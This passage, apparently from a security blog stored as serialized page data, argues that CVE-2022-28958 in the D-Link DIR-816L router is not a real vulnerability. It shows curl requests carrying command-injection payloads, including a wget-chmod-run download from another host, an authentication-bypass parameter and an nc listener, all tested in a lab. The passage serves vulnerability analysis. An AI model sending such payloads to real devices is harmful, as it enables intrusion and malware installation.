cut_count",[1373,113242,34467],{"class":1383},[1373,113244,100083],{"class":4640},[1373,113246,7035],{"class":1383},[1373,113248,183],{"class":1387},[1373,113250,113251],{"class":1391},"SERVICES",[1373,113253,183],{"class":1387},[1373,113255,27625],{"class":1383},[1373,113257,4883],{"class":1387},[1373,113259,5437],{"class":1391},[1373,113261,183],{"class":1387},[1373,113263,4680],{"class":1383},[1373,113265,113266,113269,113271,113273,113276,113278,113280,113282,113285,113287,113289,113292,113294,113296,113298,113300,113302,113304,113306,113308],{"class":1375,"line":4877},[1373,113267,113268],{"class":7297}," TRACE_debug",[1373,113270,1384],{"class":1383},[1373,113272,183],{"class":1387},[1373,113274,113275],{"class":1391},"GETCFG: got ",[1373,113277,183],{"class":1387},[1373,113279,59],{"class":1397},[1373,113281,4644],{"class":1383},[1373,113283,113284],{"class":4640},"SERVICE_COUNT",[1373,113286,59],{"class":1397},[1373,113288,183],{"class":1387},[1373,113290,113291],{"class":1391}," service(s): ",[1373,113293,183],{"class":1387},[1373,113295,59],{"class":1397},[1373,113297,4644],{"class":1383},[1373,113299,100083],{"class":4640},[1373,113301,7035],{"class":1383},[1373,113303,183],{"class":1387},[1373,113305,113251],{"class":1391},[1373,113307,183],{"class":1387},[1373,113309,34850],{"class":1383},[1373,113311,113312,113314,113317,113319,113321],{"class":1375,"line":4915},[1373,113313,4727],{"class":1383},[1373,113315,113316],{"class":4640},"SERVICE_INDEX ",[1373,113318,5417],{"class":1397},[1373,113320,5557],{"class":5467},[1373,113322,4912],{"class":1383},[1373,113324,113325,113328,113330,113332,113334,113336,113338],{"class":1375,"line":4931},[1373,113326,113327],{"class":4636}," while",[1373,113329,47425],{"class":1383},[1373,113331,113316],{"class":4640},[1373,113333,11852],{"class":1397},[1373,113335,4656],{"class":1383},[1373,113337,113284],{"class":4640},[1373,113339,11875],{"class":1383},[1373,113341,113342],{"class":1375,"line":4947},[1373,113343,9788],{"class":1383},[1373,113345,113346,113348,113351,113353,113356,113358,113360,113362,113364,113366,113368,113370,113372,113375,113377,113379,113381,113383],{"class":1375,"line":4952},[1373,113347,47435],{"class":1383},[1373,113349,113350],{"class":4640},"GETCFG_SVC ",[1373,113352,5417],{"class":1397},[1373,113354,113355],{"class":7297}," cut",[1373,113357,34467],{"class":1383},[1373,113359,100083],{"class":4640},[1373,113361,7035],{"class":1383},[1373,113363,183],{"class":1387},[1373,113365,113251],{"class":1391},[1373,113367,183],{"class":1387},[1373,113369,27625],{"class":1383},[1373,113371,4656],{"class":1383},[1373,113373,113374],{"class":4640},"SERVICE_INDEX",[1373,113376,5437],{"class":1383},[1373,113378,4883],{"class":1387},[1373,113380,5437],{"class":1391},[1373,113382,183],{"class":1387},[1373,113384,4680],{"class":1383},[1373,113386,113387,113390,113392,113394,113397,113399,113401,113403,113405,113407,113409,113412,113414,113416,113418,113421],{"class":1375,"line":6776},[1373,113388,113389],{"class":7297}," TRACE_debug",[1373,113391,1384],{"class":1383},[1373,113393,183],{"class":1387},[1373,113395,113396],{"class":1391},"GETCFG: serivce[",[1373,113398,183],{"class":1387},[1373,113400,59],{"class":1397},[1373,113402,4644],{"class":1383},[1373,113404,113374],{"class":4640},[1373,113406,59],{"class":1397},[1373,113408,183],{"class":1387},[1373,113410,113411],{"class":1391},"] = ",[1373,113413,183],{"class":1387},[1373,113415,59],{"class":1397},[1373,113417,4644],{"class":1383},[1373,113419,113420],{"class":4640},"GETCFG_SVC",[1373,113422,4680],{"class":1383},[1373,113424,113425,113427,113429,113431,113433,113435],{"class":1375,"line":6781},[1373,113426,9793],{"class":4636},[1373,113428,47425],{"class":1383},[1373,113430,113420],{"class":4640},[1373,113432,15677],{"class":1397},[1373,113434,7083],{"class":1387},[1373,113436,11875],{"class":1383},[1373,113438,113439],{"class":1375,"line":7524},[1373,113440,9814],{"class":1383},[1373,113442,113443,113445,113447,113449,113451,113454,113456,113458,113460,113462,113464,113466,113469,113471],{"class":1375,"line":7530},[1373,113444,9819],{"class":1383},[1373,113446,94251],{"class":4640},[1373,113448,5417],{"class":1397},[1373,113450,4883],{"class":1387},[1373,113452,113453],{"class":1391},"\u002Fhtdocs\u002Fwebinc\u002Fgetcfg\u002F",[1373,113455,183],{"class":1387},[1373,113457,59],{"class":1397},[1373,113459,4644],{"class":1383},[1373,113461,113420],{"class":4640},[1373,113463,59],{"class":1397},[1373,113465,183],{"class":1387},[1373,113467,113468],{"class":1391},".xml.php",[1373,113470,183],{"class":1387},[1373,113472,4912],{"class":1383},[1373,113474,113475],{"class":1375,"line":7546},[1373,113476,113477],{"class":4630}," \u002F* GETCFG_SVC will be passed to the child process. *\u002F\n",[1373,113479,113480,113482,113484,113487,113489,113491,113493,113495,113497,113499,113501],{"class":1375,"line":7571},[1373,113481,18293],{"class":4636},[1373,113483,4641],{"class":1383},[1373,113485,113486],{"class":7297},"isfile",[1373,113488,34467],{"class":1383},[1373,113490,85692],{"class":4640},[1373,113492,2230],{"class":1383},[1373,113494,15920],{"class":1397},[1373,113496,183],{"class":1387},[1373,113498,467],{"class":1391},[1373,113500,183],{"class":1387},[1373,113502,11875],{"class":1383},[1373,113504,113505],{"class":1375,"line":7598},[1373,113506,15802],{"class":1383},[1373,113508,113509,113512,113514,113516,113518,113520,113523,113525],{"class":1375,"line":7615},[1373,113510,113511],{"class":7297}," AES_Encrypt_DBnode",[1373,113513,34467],{"class":1383},[1373,113515,113420],{"class":4640},[1373,113517,5437],{"class":1383},[1373,113519,4883],{"class":1387},[1373,113521,113522],{"class":1391},"Encrypt",[1373,113524,183],{"class":1387},[1373,113526,4680],{"class":1383},[1373,113528,113529,113532,113534,113536,113538,113540,113542,113544,113546],{"class":1375,"line":7635},[1373,113530,113531],{"class":7297}," dophp",[1373,113533,1384],{"class":1383},[1373,113535,183],{"class":1387},[1373,113537,75722],{"class":1391},[1373,113539,183],{"class":1387},[1373,113541,5437],{"class":1383},[1373,113543,4656],{"class":1383},[1373,113545,85692],{"class":4640},[1373,113547,4680],{"class":1383},[1373,113549,113550,113552,113554,113556,113558,113560,113563,113565],{"class":1375,"line":7640},[1373,113551,113511],{"class":7297},[1373,113553,34467],{"class":1383},[1373,113555,113420],{"class":4640},[1373,113557,5437],{"class":1383},[1373,113559,4883],{"class":1387},[1373,113561,113562],{"class":1391},"Decrypt",[1373,113564,183],{"class":1387},[1373,113566,4680],{"class":1383},[1373,113568,113569],{"class":1375,"line":7648},[1373,113570,18320],{"class":1383},[1373,113572,113573],{"class":1375,"line":7672},[1373,113574,9832],{"class":1383},[1373,113576,113577,113579,113581,113583],{"class":1375,"line":7688},[1373,113578,47435],{"class":1383},[1373,113580,113374],{"class":4640},[1373,113582,94006],{"class":1397},[1373,113584,4912],{"class":1383},[1373,113586,113587],{"class":1375,"line":7709},[1373,113588,9861],{"class":1383},[1373,113590,113591],{"class":1375,"line":7714},[1373,113592,4795],{"class":1383},[1373,113594,113595],{"class":1375,"line":7722},[1373,113596,1855],{"class":1383},[18,113598,113599,113600,113603],{},"After reading the above code, it’s obvious the researcher's proof of concept is useless. It doesn’t touch the endpoint where the vulnerable code allegedly resides, and the endpoint it does reach doesn’t do anything with the provided parameters. It’s amusing that, apparently, the Moobot developers copied the researcher’s mistake. Pictured below, from Unit 42's ",[47,113601,11046],{"href":112596,"rel":113602},[51],", is Moobot's implementation of CVE-2022-28958 as seen via Wireshark:",[18,113605,113606],{},[68,113607],{":width":10862,"alt":112689,"src":113608},"\u002Fblog\u002Fmoobot-uses-fake-vulnerability\u002Fmoobot_exploit.png",[18,113610,113611,113612,113614,113615,982,113617,113619,113620,113622,113623,1554,113625,113627],{},"Above, Moobot sends an HTTP POST request to ",[886,113613,113046],{}," using both the ",[886,113616,100044],{},[886,113618,85021],{}," parameters just as the researcher’s incorrect proof of concept did. As we've seen, ",[886,113621,113046],{}," doesn't handle ",[886,113624,100044],{},[886,113626,85021],{},". Moobot's exploit doesn’t work.",[18,113629,113630,113631,39227,113634,113637,113638,113640,113641,113644,113645,113648,113649,113652],{},"If the screenshot can be trusted, the Moobot developers also encoded the payload incorrectly. By using ",[886,113632,113633],{},"value=&",[886,113635,113636],{},"value=%26",", they've messed up the (assumed) command injection and simply set ",[886,113639,85021],{}," to an empty string. Also, the authentication bypass at the end (",[886,113642,113643],{},"AUTHORIZED_GROUP=1"," aka CVE-2022-28956, CVE-2020-15894, CVE-2020-9376, CVE-2019-17506, and CVE-2018-7034) ",[295,113646,113647],{},"has to"," start with ",[886,113650,113651],{},"%0a"," to work, which isn't the case here.",[18,113654,113655,113656,113658],{},"Either way, the exploit can't work because it's hitting the wrong endpoint. Which is interesting, but that doesn't mean ",[886,113657,112717],{}," isn't exploitable. Let’s do some testing to prove that CVE-2022–28958 doesn’t exist!",[1920,113660,113662],{"id":113661},"local-testing-of-a-d-link-dir-816l","Local Testing of a D-Link DIR-816L",[18,113664,113665,113666,4606],{},"The affected DIR-816L is end-of-life, but it was easy find one on Ebay. Fortuatunely, the affected firmware, 2.06.B01, is also available on D-Link’s legacy ",[47,113667,113670],{"href":113668,"rel":113669},"http:\u002F\u002Flegacyfiles.us.dlink.com\u002FDIR-816L\u002FREVB\u002FSECURITY_PATCHES\u002F",[51],"files archive",[18,113672,113673],{},[68,113674],{":width":10862,"alt":112689,"src":113675},"\u002Fblog\u002Fmoobot-uses-fake-vulnerability\u002Flegacy_files.png",[18,113677,113678],{},"So we had everything needed to test the device in a local lab setup. We started testing by throwing the researcher’s original proof of concept at the device.",[100588,113680,113681],{},[1354,113682,113684],{"className":31740,"code":113683,"language":2186,"meta":219,"style":219},"albinolobster@mournland:~$ curl -d \"action=sethostname&value=%26%20ls%20-la%20%26%0aAUTHORIZED_GROUP=1\" http:\u002F\u002F192.168.0.1:80\u002Fgetcfg.php\n",[886,113685,113686],{"__ignoreMap":219},[1373,113687,113688,113690,113692,113694,113696,113698,113700],{"class":1375,"line":1376},[1373,113689,55482],{"class":2206},[1373,113691,2222],{"class":1391},[1373,113693,87473],{"class":2209},[1373,113695,4883],{"class":1387},[1373,113697,113025],{"class":1391},[1373,113699,183],{"class":1387},[1373,113701,113702],{"class":1391}," http:\u002F\u002F192.168.0.1:80\u002Fgetcfg.php\n",[1354,113704,113706],{"className":56326,"code":113705,"language":56328,"meta":219,"style":219},"\u003C?xml version=\"1.0\" encoding=\"utf-8\"?>\n\u003Cpostxml>\n\u003C\u002Fpostxml>\n",[886,113707,113708,113737,113746],{"__ignoreMap":219},[1373,113709,113710,113712,113714,113716,113718,113720,113722,113724,113726,113728,113730,113732,113734],{"class":1375,"line":1376},[1373,113711,2323],{"class":1383},[1373,113713,56328],{"class":6300},[1373,113715,45880],{"class":8252},[1373,113717,5417],{"class":1383},[1373,113719,183],{"class":1387},[1373,113721,84878],{"class":1391},[1373,113723,183],{"class":1387},[1373,113725,84883],{"class":8252},[1373,113727,5417],{"class":1383},[1373,113729,183],{"class":1387},[1373,113731,48993],{"class":1391},[1373,113733,183],{"class":1387},[1373,113735,113736],{"class":1383},"?>\n",[1373,113738,113739,113741,113744],{"class":1375,"line":220},[1373,113740,11852],{"class":1383},[1373,113742,113743],{"class":6300},"postxml",[1373,113745,6765],{"class":1383},[1373,113747,113748,113750,113752],{"class":1375,"line":1266},[1373,113749,46627],{"class":1383},[1373,113751,113743],{"class":6300},[1373,113753,6765],{"class":1383},[18,113755,113756,113757,113760],{},"Underwhelming to say the least. No indication that ",[886,113758,113759],{},"& ls -l &"," was executed. So we tried the Moobot payload.",[100588,113762,113763],{},[1354,113764,113766],{"className":31740,"code":113765,"language":2186,"meta":219,"style":219},"albinolobster@mournland:~$ curl -d \"action=sethostname&value=& wget http:\u002F\u002F192.168.0.164\u002Ftest; chmod 777 test; .\u002Ftest & AUTHORIZED_GROUP=1\" http:\u002F\u002F192.168.0.1:80\u002Fgetcfg.php\n",[886,113767,113768],{"__ignoreMap":219},[1373,113769,113770,113772,113774,113776,113778,113781,113783],{"class":1375,"line":1376},[1373,113771,55482],{"class":2206},[1373,113773,2222],{"class":1391},[1373,113775,87473],{"class":2209},[1373,113777,4883],{"class":1387},[1373,113779,113780],{"class":1391},"action=sethostname&value=& wget http:\u002F\u002F192.168.0.164\u002Ftest; chmod 777 test; .\u002Ftest & AUTHORIZED_GROUP=1",[1373,113782,183],{"class":1387},[1373,113784,113702],{"class":1391},[1354,113786,113788],{"className":56326,"code":113787,"language":56328,"meta":219,"style":219},"\u003C?xml version=\"1.0\" encoding=\"utf-8\"?>\n\u003Cpostxml>\n \u003Cresult>FAILED\u003C\u002Fresult>\n \u003Cmessage>Not authorized\u003C\u002Fmessage>\n\u003C\u002Fpostxml>\n",[886,113789,113790,113818,113826,113843,113861],{"__ignoreMap":219},[1373,113791,113792,113794,113796,113798,113800,113802,113804,113806,113808,113810,113812,113814,113816],{"class":1375,"line":1376},[1373,113793,2323],{"class":1383},[1373,113795,56328],{"class":6300},[1373,113797,45880],{"class":8252},[1373,113799,5417],{"class":1383},[1373,113801,183],{"class":1387},[1373,113803,84878],{"class":1391},[1373,113805,183],{"class":1387},[1373,113807,84883],{"class":8252},[1373,113809,5417],{"class":1383},[1373,113811,183],{"class":1387},[1373,113813,48993],{"class":1391},[1373,113815,183],{"class":1387},[1373,113817,113736],{"class":1383},[1373,113819,113820,113822,113824],{"class":1375,"line":220},[1373,113821,11852],{"class":1383},[1373,113823,113743],{"class":6300},[1373,113825,6765],{"class":1383},[1373,113827,113828,113830,113832,113834,113837,113839,113841],{"class":1375,"line":1266},[1373,113829,8246],{"class":1383},[1373,113831,17636],{"class":6300},[1373,113833,5384],{"class":1383},[1373,113835,113836],{"class":4640},"FAILED",[1373,113838,46627],{"class":1383},[1373,113840,17636],{"class":6300},[1373,113842,6765],{"class":1383},[1373,113844,113845,113847,113850,113852,113855,113857,113859],{"class":1375,"line":1852},[1373,113846,8246],{"class":1383},[1373,113848,113849],{"class":6300},"message",[1373,113851,5384],{"class":1383},[1373,113853,113854],{"class":4640},"Not authorized",[1373,113856,46627],{"class":1383},[1373,113858,113849],{"class":6300},[1373,113860,6765],{"class":1383},[1373,113862,113863,113865,113867],{"class":1375,"line":4692},[1373,113864,46627],{"class":1383},[1373,113866,113743],{"class":6300},[1373,113868,6765],{"class":1383},[18,113870,113871],{},"We received a “Not authorized” response because the authorization bypass didn’t work, as we predicted earlier in the blog. Without a working bypass, the attacker needs to be authenticated to the device. This is a fairly important detail that NIST overlooked when assigning CVE-2022-28958 a CVSSv3 score of 9.8. CISA, presumably, also overlooked this when they added CVE-2022–28958 to the KEV Catalog but not CVE-2022–28956.",[18,113873,113874],{},"If we fix Moobot's exploit to use the bypass correctly, fix the (assumed) command injection, and simplify the payload then we get this:",[100588,113876,113877],{},[1354,113878,113880],{"className":31740,"code":113879,"language":2186,"meta":219,"style":219},"albinolobster@mournland:~$ curl -d \"action=sethostname&value=%26%20wget%20http:\u002F\u002F192.168.0.164\u002Ftest%20%26%0aAUTHORIZED_GROUP=ok\" http:\u002F\u002F192.168.0.1:80\u002Fgetcfg.php\n",[886,113881,113882],{"__ignoreMap":219},[1373,113883,113884,113886,113888,113890,113892,113895,113897],{"class":1375,"line":1376},[1373,113885,55482],{"class":2206},[1373,113887,2222],{"class":1391},[1373,113889,87473],{"class":2209},[1373,113891,4883],{"class":1387},[1373,113893,113894],{"class":1391},"action=sethostname&value=%26%20wget%20http:\u002F\u002F192.168.0.164\u002Ftest%20%26%0aAUTHORIZED_GROUP=ok",[1373,113896,183],{"class":1387},[1373,113898,113702],{"class":1391},[1354,113900,113901],{"className":56326,"code":113705,"language":56328,"meta":219,"style":219},[886,113902,113903,113931,113939],{"__ignoreMap":219},[1373,113904,113905,113907,113909,113911,113913,113915,113917,113919,113921,113923,113925,113927,113929],{"class":1375,"line":1376},[1373,113906,2323],{"class":1383},[1373,113908,56328],{"class":6300},[1373,113910,45880],{"class":8252},[1373,113912,5417],{"class":1383},[1373,113914,183],{"class":1387},[1373,113916,84878],{"class":1391},[1373,113918,183],{"class":1387},[1373,113920,84883],{"class":8252},[1373,113922,5417],{"class":1383},[1373,113924,183],{"class":1387},[1373,113926,48993],{"class":1391},[1373,113928,183],{"class":1387},[1373,113930,113736],{"class":1383},[1373,113932,113933,113935,113937],{"class":1375,"line":220},[1373,113934,11852],{"class":1383},[1373,113936,113743],{"class":6300},[1373,113938,6765],{"class":1383},[1373,113940,113941,113943,113945],{"class":1375,"line":1266},[1373,113942,46627],{"class":1383},[1373,113944,113743],{"class":6300},[1373,113946,6765],{"class":1383},[18,113948,113949,113950,113952,113953,113955,113956,113958],{},"Now, in this case, we had ",[886,113951,30202],{}," listening for a ",[886,113954,1553],{}," callback on 192.168.0.164, and we do know that ",[886,113957,1553],{}," is present on the DIR-816L. But, again, we get nothing from the device:",[100588,113960,113961],{},[1354,113962,113964],{"className":31740,"code":113963,"language":2186,"meta":219,"style":219},"albinolobster@mournland:~$ sudo nc -lvnp 80\n[sudo] password for albinolobster:\nListening on 0.0.0.0 80\n",[886,113965,113966,113981,113997],{"__ignoreMap":219},[1373,113967,113968,113970,113972,113975,113978],{"class":1375,"line":1376},[1373,113969,55482],{"class":2206},[1373,113971,17747],{"class":1391},[1373,113973,113974],{"class":1391}," nc",[1373,113976,113977],{"class":2209}," -lvnp",[1373,113979,113980],{"class":5467}," 80\n",[1373,113982,113983,113985,113988,113990,113992,113994],{"class":1375,"line":220},[1373,113984,7035],{"class":1383},[1373,113986,113987],{"class":4640},"sudo",[1373,113989,15050],{"class":1383},[1373,113991,108800],{"class":4640},[1373,113993,98551],{"class":4636},[1373,113995,113996],{"class":4640}," albinolobster:\n",[1373,113998,113999,114002,114004,114007],{"class":1375,"line":1266},[1373,114000,114001],{"class":2206},"Listening",[1373,114003,98466],{"class":1391},[1373,114005,114006],{"class":5467}," 0.0.0.0",[1373,114008,113980],{"class":5467},[18,114010,114011,114012,114014,114015,114017,114018,114020,114021,4606],{},"But remember, we didn't expect any of that to work anyway. We already knew ",[886,114013,113046],{}," is the wrong endpoint. We only tested the original researcher's proof of concept to be thorough. What we really want to know is if ",[886,114016,112717],{}," is exploitable as the original writeup and CVE description suggest. Let’s try the previous ",[886,114019,1553],{}," payload, but this time pointed at ",[886,114022,112717],{},[100588,114024,114025],{},[1354,114026,114028],{"className":31740,"code":114027,"language":2186,"meta":219,"style":219},"albinolobster@mournland:~$ curl -d \"action=sethostname&value=%26%20wget%20http:\u002F\u002F192.168.0.164\u002Ftest%20%26%0aAUTHORIZED_GROUP=ok\" http:\u002F\u002F192.168.0.1:80\u002Fshareport.php\n",[886,114029,114030],{"__ignoreMap":219},[1373,114031,114032,114034,114036,114038,114040,114042,114044],{"class":1375,"line":1376},[1373,114033,55482],{"class":2206},[1373,114035,2222],{"class":1391},[1373,114037,87473],{"class":2209},[1373,114039,4883],{"class":1387},[1373,114041,113894],{"class":1391},[1373,114043,183],{"class":1387},[1373,114045,114046],{"class":1391}," http:\u002F\u002F192.168.0.1:80\u002Fshareport.php\n",[1354,114048,114050],{"className":56326,"code":114049,"language":56328,"meta":219,"style":219},"\u003C?xml version=\"1.0\" encoding=\"utf-8\"?>\n\u003Cshareportreport>\n \u003Caction>sethostname\u003C\u002Faction>\n \u003Cresult>OK\u003C\u002Fresult>\n \u003Creason>\u003C\u002Freason>\n\u003C\u002Fshareportreport>\n",[886,114051,114052,114080,114089,114105,114121,114134],{"__ignoreMap":219},[1373,114053,114054,114056,114058,114060,114062,114064,114066,114068,114070,114072,114074,114076,114078],{"class":1375,"line":1376},[1373,114055,2323],{"class":1383},[1373,114057,56328],{"class":6300},[1373,114059,45880],{"class":8252},[1373,114061,5417],{"class":1383},[1373,114063,183],{"class":1387},[1373,114065,84878],{"class":1391},[1373,114067,183],{"class":1387},[1373,114069,84883],{"class":8252},[1373,114071,5417],{"class":1383},[1373,114073,183],{"class":1387},[1373,114075,48993],{"class":1391},[1373,114077,183],{"class":1387},[1373,114079,113736],{"class":1383},[1373,114081,114082,114084,114087],{"class":1375,"line":220},[1373,114083,11852],{"class":1383},[1373,114085,114086],{"class":6300},"shareportreport",[1373,114088,6765],{"class":1383},[1373,114090,114091,114093,114095,114097,114099,114101,114103],{"class":1375,"line":1266},[1373,114092,8246],{"class":1383},[1373,114094,100044],{"class":6300},[1373,114096,5384],{"class":1383},[1373,114098,112819],{"class":4640},[1373,114100,46627],{"class":1383},[1373,114102,100044],{"class":6300},[1373,114104,6765],{"class":1383},[1373,114106,114107,114109,114111,114113,114115,114117,114119],{"class":1375,"line":1852},[1373,114108,8246],{"class":1383},[1373,114110,17636],{"class":6300},[1373,114112,5384],{"class":1383},[1373,114114,112919],{"class":4640},[1373,114116,46627],{"class":1383},[1373,114118,17636],{"class":6300},[1373,114120,6765],{"class":1383},[1373,114122,114123,114125,114128,114130,114132],{"class":1375,"line":4692},[1373,114124,8246],{"class":1383},[1373,114126,114127],{"class":6300},"reason",[1373,114129,49120],{"class":1383},[1373,114131,114127],{"class":6300},[1373,114133,6765],{"class":1383},[1373,114135,114136,114138,114140],{"class":1375,"line":4724},[1373,114137,46627],{"class":1383},[1373,114139,114086],{"class":6300},[1373,114141,6765],{"class":1383},[18,114143,114144,114145,114147,114148,114150,114151,114153],{},"A new response! But still no ",[886,114146,1553],{}," request to our listening ",[886,114149,30202],{}," on port 80. Maybe the researcher’s original ",[886,114152,113039],{}," payload will yield a result?",[100588,114155,114156],{},[1354,114157,114159],{"className":31740,"code":114158,"language":2186,"meta":219,"style":219},"albinolobster@mournland:~$ curl -d \"action=sethostname&value=%26%20ls%20-l%20%26%0aAUTHORIZED_GROUP=ok\" http:\u002F\u002F192.168.0.1:80\u002Fshareport.php\n",[886,114160,114161],{"__ignoreMap":219},[1373,114162,114163,114165,114167,114169,114171,114174,114176],{"class":1375,"line":1376},[1373,114164,55482],{"class":2206},[1373,114166,2222],{"class":1391},[1373,114168,87473],{"class":2209},[1373,114170,4883],{"class":1387},[1373,114172,114173],{"class":1391},"action=sethostname&value=%26%20ls%20-l%20%26%0aAUTHORIZED_GROUP=ok",[1373,114175,183],{"class":1387},[1373,114177,114046],{"class":1391},[1354,114179,114180],{"className":56326,"code":114049,"language":56328,"meta":219,"style":219},[886,114181,114182,114210,114218,114234,114250,114262],{"__ignoreMap":219},[1373,114183,114184,114186,114188,114190,114192,114194,114196,114198,114200,114202,114204,114206,114208],{"class":1375,"line":1376},[1373,114185,2323],{"class":1383},[1373,114187,56328],{"class":6300},[1373,114189,45880],{"class":8252},[1373,114191,5417],{"class":1383},[1373,114193,183],{"class":1387},[1373,114195,84878],{"class":1391},[1373,114197,183],{"class":1387},[1373,114199,84883],{"class":8252},[1373,114201,5417],{"class":1383},[1373,114203,183],{"class":1387},[1373,114205,48993],{"class":1391},[1373,114207,183],{"class":1387},[1373,114209,113736],{"class":1383},[1373,114211,114212,114214,114216],{"class":1375,"line":220},[1373,114213,11852],{"class":1383},[1373,114215,114086],{"class":6300},[1373,114217,6765],{"class":1383},[1373,114219,114220,114222,114224,114226,114228,114230,114232],{"class":1375,"line":1266},[1373,114221,8246],{"class":1383},[1373,114223,100044],{"class":6300},[1373,114225,5384],{"class":1383},[1373,114227,112819],{"class":4640},[1373,114229,46627],{"class":1383},[1373,114231,100044],{"class":6300},[1373,114233,6765],{"class":1383},[1373,114235,114236,114238,114240,114242,114244,114246,114248],{"class":1375,"line":1852},[1373,114237,8246],{"class":1383},[1373,114239,17636],{"class":6300},[1373,114241,5384],{"class":1383},[1373,114243,112919],{"class":4640},[1373,114245,46627],{"class":1383},[1373,114247,17636],{"class":6300},[1373,114249,6765],{"class":1383},[1373,114251,114252,114254,114256,114258,114260],{"class":1375,"line":4692},[1373,114253,8246],{"class":1383},[1373,114255,114127],{"class":6300},[1373,114257,49120],{"class":1383},[1373,114259,114127],{"class":6300},[1373,114261,6765],{"class":1383},[1373,114263,114264,114266,114268],{"class":1375,"line":4724},[1373,114265,46627],{"class":1383},[1373,114267,114086],{"class":6300},[1373,114269,6765],{"class":1383},[18,114271,114272,114273,114275],{},"Again, no proof the exploit was successful. Perhaps exploitation is blind? If that's the case, why provide a proof of concept using ",[886,114274,113039],{},"? Maybe the proof of concept messed up the shell metacharacters? A single ampersand is an odd choice. We fiddled with the metacharacters and tested all these exploits against firmware versions: 2.03b1, 2.06b1 (the reportedly vulnerable version), and 2.06b09 Beta. The \"exploits\" didn't work on any of these firmware. But why?",[1920,114277,114279],{"id":114278},"cve-2022-28958-not-a-real-vulnerability","CVE-2022-28958: Not a Real Vulnerability",[18,114281,114282,114283,114285,114286],{},"Let's return to the researcher's original claim. They state the following code in ",[886,114284,112717],{}," does not have ",[1131,114287,114288],{},"\"enough filter with parameter ‘value’, it just passed to function set which execute command directly.\"",[1354,114290,114292],{"className":1367,"code":114291,"language":1369,"meta":219,"style":219},"set(\"\u002Fdevice\u002Fgw_name\", $value);\n",[886,114293,114294],{"__ignoreMap":219},[1373,114295,114296,114298,114300,114302,114304,114306,114308,114310,114312],{"class":1375,"line":1376},[1373,114297,86867],{"class":7297},[1373,114299,1384],{"class":1383},[1373,114301,183],{"class":1387},[1373,114303,112879],{"class":1391},[1373,114305,183],{"class":1387},[1373,114307,5437],{"class":1383},[1373,114309,4656],{"class":1383},[1373,114311,85021],{"class":4640},[1373,114313,4680],{"class":1383},[18,114315,114316,114317,114319,114320,114323,114324,114326,114327,20559,114329,114331,114332,114334,114335,10515,114337,114340],{},"The claim that ",[886,114318,112981],{}," will ",[1131,114321,114322],{},"\"execute command directly\""," is what needs to be examined. It would seem the researcher thinks ",[886,114325,112981],{}," will execute ",[886,114328,112879],{},[886,114330,112992],{}," as some type of parameter. However, after looking at the firmware's code, we know ",[886,114333,112879],{}," isn't a binary and ",[886,114336,112981],{},[1131,114338,114339],{},"doesn't"," execute commands.",[18,114342,114343,114344,1554,114346,114348,114349,114351,114352,114354,114355,14193,114358,114360,114361,114364,114365,1246,114367,1246,114370,1255,114373,114376,114377,114380,114381,27987],{},"Execution of PHP files like ",[886,114345,113046],{},[886,114347,112717],{}," on the DIR-816L is a bit opaque. The files are served via the ",[886,114350,92999],{}," binary, but it passes execution of ",[886,114353,1369],{}," files to a binary called ",[886,114356,114357],{},"cgibin",[886,114359,114357],{}," passes execution to a binary called ",[886,114362,114363],{},"xmldb",", which has a custom PHP interpreter. Exactly how custom, we're not sure, but they've added a few builtins like ",[886,114366,112981],{},[886,114368,114369],{},"setattr()",[886,114371,114372],{},"event()",[886,114374,114375],{},"query()",". These extra builtins are for interacting with the ",[1131,114378,114379],{},"xml database"," (hence the binary's name, ",[886,114382,114363],{},[18,114384,114385,114386,114389,114390,114392,114393,114395,114396,114399,114400,114402],{},"The xml database contains the router's configuration. When the user calls ",[886,114387,114388],{},"set(\"\u002Fdevice\u002Fgw_name\", $value)",", they are inserting ",[886,114391,112992],{}," into the ",[886,114394,112879],{}," entry in the xml database. If you root the device, you’ll find you can examine the database from the device's command line using the ",[886,114397,114398],{},"xmldbc"," (xml db client) binary. In the following example, we list the contents of ",[886,114401,112879],{}," in the xml database of a DIR-816L we had just “exploited.”",[1354,114404,114406],{"className":31740,"code":114405,"language":2186,"meta":219,"style":219},"# xmldbc -g \u002Fdevice\u002Fgw_name\n& wget http:\u002F\u002F192.168.0.164\u002Ftest &\n# xmldbc -d \u002Ftmp\u002Fconfig.xml\n# cat \u002Ftmp\u002Fconfig.xml | grep gw_name\n\u003Cgw_name>& wget http:\u002F\u002F192.168.0.164\u002Ftest & \u003C\u002Fgw_name>\n",[886,114407,114408,114413,114425,114430,114435],{"__ignoreMap":219},[1373,114409,114410],{"class":1375,"line":1376},[1373,114411,114412],{"class":4630},"# xmldbc -g \u002Fdevice\u002Fgw_name\n",[1373,114414,114415,114417,114419,114422],{"class":1375,"line":220},[1373,114416,7218],{"class":1383},[1373,114418,39700],{"class":2206},[1373,114420,114421],{"class":1391}," http:\u002F\u002F192.168.0.164\u002Ftest",[1373,114423,114424],{"class":1383}," &\n",[1373,114426,114427],{"class":1375,"line":1266},[1373,114428,114429],{"class":4630},"# xmldbc -d \u002Ftmp\u002Fconfig.xml\n",[1373,114431,114432],{"class":1375,"line":1852},[1373,114433,114434],{"class":4630},"# cat \u002Ftmp\u002Fconfig.xml | grep gw_name\n",[1373,114436,114437,114439,114442,114445,114448,114450,114452,114454,114456,114458,114460,114462,114465],{"class":1375,"line":4692},[1373,114438,11852],{"class":1397},[1373,114440,114441],{"class":4640},"gw_name",[1373,114443,114444],{"class":1397},">&",[1373,114446,114447],{"class":2206},"amp",[1373,114449,39663],{"class":1383},[1373,114451,39700],{"class":2206},[1373,114453,114421],{"class":1391},[1373,114455,87587],{"class":1383},[1373,114457,114447],{"class":2206},[1373,114459,39663],{"class":1383},[1373,114461,27250],{"class":1397},[1373,114463,114464],{"class":2206},"\u002Fgw_name",[1373,114466,6765],{"class":4640},[18,114468,114469,114470,114472,114473,114475,114476,114478,114479,114481,114482,114484],{},"Here you can see our malicious ",[886,114471,1553],{}," was inserted into the database, just as we said. The shell metacharacters were even encoded properly when inserted into the xml. Not only is there no evidence of ",[886,114474,1553],{}," being executed, but it isn't even part of ",[886,114477,112981],{},"'s intended functionality. ",[886,114480,112981],{}," does not execute ",[886,114483,85021],{}," \"directly\", as stated in the disclosure.",[18,114486,114487,114488,114490],{},"Looking deeper with Ghidra, we didn't find any evidence of command execution when tracing the logic from the http server through ",[886,114489,114398],{}," and into the database. It's obviously difficult to prove a negative, especially with so many moving parts. But after testing the exploits, looking at the functionality, and examining where the payload lands, it’s difficult to say the original claims hold up.",[18,114492,114493],{},"However, this vulnerability is in the KEV Catalog so it’s worth looking even deeper. Let’s seek out artifacts left by CVE-2022-28958 “exploitation” on internet-facing 